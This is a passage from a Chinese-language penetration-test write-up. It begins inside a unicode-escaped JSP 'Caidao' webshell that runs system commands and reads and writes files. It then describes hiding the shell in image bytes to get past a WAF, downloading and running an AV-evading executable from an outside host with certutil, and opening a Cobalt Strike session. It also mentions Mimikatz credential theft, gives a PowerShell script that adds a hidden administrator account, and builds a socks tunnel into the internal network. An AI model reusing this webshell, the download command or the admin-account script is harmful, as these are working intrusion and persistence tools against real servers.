u0021u0073u002eu0073u0075u0062u0073u0074u0072u0069u006eu0067u0028u0030u002cu0031u0029u002eu0065u0071u0075u0061u006cu0073u0028u0022u002fu0022u0029u0029u007bu0041u0041u0028u0073u0062u0029u003bu007du007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u0042u0022u0029u0029u007bu0042u0042u0028u007au0031u002cu0073u0062u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u0043u0022u0029u0029u007bu0053u0074u0072u0069u006eu0067u0020u006cu003du0022u0022u003bu0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0020u0062u0072u003du006eu0065u0077u0020u0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0028u006eu0065u0077u0020u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0052u0065u0061u0064u0065u0072u0028u006eu0065u0077u0020u0046u0069u006cu0065u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u006eu0065u0077u0020u0046u0069u006cu0065u0028u007au0031u0029u0029u0029u0029u003bu0077u0068u0069u006cu0065u0028u0028u006cu003du0062u0072u002eu0072u0065u0061u0064u004cu0069u006eu0065u0028u0029u0029u0021u003du006eu0075u006cu006cu0029u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u006cu002bu0022u005cu0072u005cu006eu0022u0029u003bu007du0062u0072u002eu0063u006cu006fu0073u0065u0028u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u0044u0022u0029u0029u007bu0042u0075u0066u0066u0065u0072u0065u0064u0057u0072u0069u0074u0065u0072u0020u0062u0077u003du006eu0065u0077u0020u0042u0075u0066u0066u0065u0072u0065u0064u0057u0072u0069u0074u0065u0072u0028u006eu0065u0077u0020u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0057u0072u0069u0074u0065u0072u0028u006eu0065u0077u0020u0046u0069u006cu0065u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0028u006eu0065u0077u0020u0046u0069u006cu0065u0028u007au0031u0029u0029u0029u0029u003bu0062u0077u002eu0077u0072u0069u0074u0065u0028u007au0032u0029u003bu0062u0077u002eu0063u006cu006fu0073u0065u0028u0029u003bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0031u0022u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u0045u0022u0029u0029u007bu0045u0045u0028u007au0031u0029u003bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0031u0022u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u0046u0022u0029u0029u007bu0046u0046u0028u007au0031u002cu0072u0065u0073u0070u006fu006eu0073u0065u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u0047u0022u0029u0029u007bu0047u0047u0028u007au0031u002cu007au0032u0029u003bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0031u0022u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u0048u0022u0029u0029u007bu0048u0048u0028u007au0031u002cu007au0032u0029u003bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0031u0022u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u0049u0022u0029u0029u007bu0049u0049u0028u007au0031u002cu007au0032u0029u003bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0031u0022u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u004au0022u0029u0029u007bu004au004au0028u007au0031u0029u003bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0031u0022u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u004bu0022u0029u0029u007bu004bu004bu0028u007au0031u002cu007au0032u0029u003bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0031u0022u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u004cu0022u0029u0029u007bu004cu004cu0028u007au0031u002cu007au0032u0029u003bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0031u0022u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u004du0022u0029u0029u007bu0053u0074u0072u0069u006eu0067u005bu005du0020u0063u003du007bu007au0031u002eu0073u0075u0062u0073u0074u0072u0069u006eu0067u0028u0032u0029u002cu007au0031u002eu0073u0075u0062u0073u0074u0072u0069u006eu0067u0028u0030u002cu0032u0029u002cu007au0032u007du003bu0050u0072u006fu0063u0065u0073u0073u0020u0070u003du0052u0075u006eu0074u0069u006du0065u002eu0067u0065u0074u0052u0075u006eu0074u0069u006du0065u0028u0029u002eu0065u0078u0065u0063u0028u0063u0029u003bu004du004du0028u0070u002eu0067u0065u0074u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u002cu0073u0062u0029u003bu004du004du0028u0070u002eu0067u0065u0074u0045u0072u0072u006fu0072u0053u0074u0072u0065u0061u006du0028u0029u002cu0073u0062u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u004eu0022u0029u0029u007bu004eu004eu0028u007au0031u002cu0073u0062u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u004fu0022u0029u0029u007bu004fu004fu0028u007au0031u002cu0073u0062u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u0050u0022u0029u0029u007bu0050u0050u0028u007au0031u002cu0073u0062u0029u003bu007du0065u006cu0073u0065u0020u0069u0066u0028u005au002eu0065u0071u0075u0061u006cu0073u0028u0022u0051u0022u0029u0029u007bu0051u0051u0028u0063u0073u002cu007au0031u002cu007au0032u002cu0073u0062u0029u003bu007du007du0063u0061u0074u0063u0068u0028u0045u0078u0063u0065u0070u0074u0069u006fu006eu0020u0065u0029u007bu0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0045u0052u0052u004fu0052u0022u002bu0022u003au002fu002fu0020u0022u002bu0065u002eu0074u006fu0053u0074u0072u0069u006eu0067u0028u0029u0029u003bu007du0073u0062u002eu0061u0070u0070u0065u006eu0064u0028u0022u0058u0040u0059u0022u0029u003bu006fu0075u0074u002eu0070u0072u0069u006eu0074u0028u0073u0062u002eu0074u006fu0053u0074u0072u0069u006eu0067u0028u0029u0029u003b%>
可以上传成功。
使用caidao-20160622的版本进行连接(默认分隔符: X@Y)。
然而。
看来内容校验过了,但是菜刀流量被waf拦截了。
这时想到了2种方案。
1、找一个内容加密的大马,例如php的大马的加解密过程
2、菜刀马流量中转
上传中转菜刀马,配合本地加解密脚本文件,对数据进行中转加密传输。
奈何网上关于jsp加密以及中转木马研究的文章数量有限,再加上本人不懂java开发,内容加密这条路暂时走不通了。
倒是看到了不少大佬优秀的文章,学习到了很多相关知识。
如:菜刀HTTP流量中转代理过WAF(https://links.jianshu.com/go?
to=https%3A%2F%2Fxz.aliyun.com%2Ft%2F2739)
CaidaoMitmProxy:基于HTTP代理中转菜刀过WAF(https://links.jianshu.com/go?to=https%3A%2F%2Fwww.uedbox.com%2Fpost%2F58916%2F)
内容混淆
加密既然暂时走不通,只能换一个思路,尝试对文件内容进行混淆,绕过waf。
首先想到的是图片马,尝试把木马隐藏到图片源码中,绕过waf。
在这个过程中也踩了一些坑,有些图片源码包含特殊字符会和木马的源代码发生冲突,因此需要特殊处理过的图片才能保证正常解析。
推荐使用如下图片。
使用notepad++打开图片,把jsp马插入到图片源码中。
更改为jsp后缀进行上传。
上传失败,猜测长度不够,未起到混淆的目的,复制图片的一段源码,反复的复制到木马文件的前后位置,经过若干次尝试,返回了上传成功。
访问webshell地址,解析成功,成功拿下了目标的webshell。
使用证书下载命令下载免杀exe到本地执行。
certutil.exe -urlcache -split -f http://x.x.x.x/1.exe D:/1.exeD:/1.exe
免杀处理使用https://www.jianshu.com/p/85b752731f4c中的AVIator。
cs成功接收到会话。
尝试激活guest用户,加入管理员组失败。
存在服务器防护需要绕过。
服务器为server 2008,默认情况下,可以使用Procdump+Mimikatz来读取管理员的明文密码。
具体实现可参考之前发布的文章。(https://www.jianshu.com/p/7f592854314f)
假设对方打了补丁,无法获取明文密码的情况下,可以选择powershell添加用户。
使用Get-ExecutionPolicy 查看当前执行策略为Restricted(默认策略,不允许任意脚本的执行)
使用Set-ExecutionPolicy 设置执行的策略为RemoteSigned (本地脚本无限制,但是对来自网络的脚本必须经过签名)
相关powershell命令可查看CSeroad大佬的文章。
https://www.jianshu.com/p/f728899ea71b
powershell的免杀性较强,大多数情况下都可以执行成功。
上传ps1文件到服务器中,调用powershell执行。
$computer=Get-WMIObject Win32_ComputerSystem$computername = $computer.name$username = 'admin'$password = '1234qwer..'$desc = 'Local admin account'$computer = [ADSI]"WinNT://$computername,computer"$user = $computer.Create("user", $username)$user.SetPassword($password)$user.Setinfo()$user.description = $desc$user.setinfo()$user.UserFlags = 65536$user.SetInfo()$group = [ADSI]("WinNT://$computername/administrators,group")$group.add("WinNT://$username,user")
使用cs搭建socks4隧道。
配置Proxifer。
成功把本机主机带入目标内网,连接远程桌面。
到此渗透结束。
总结
由于不懂java开发,导致前期的getshell耽误了过长时间。
渗透过程中走了很多弯路,但也学习到了很多新的知识。
更多技术文章请关注公众号:猪猪谈安全
师傅们点赞、转发、在看就是最大的支持
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论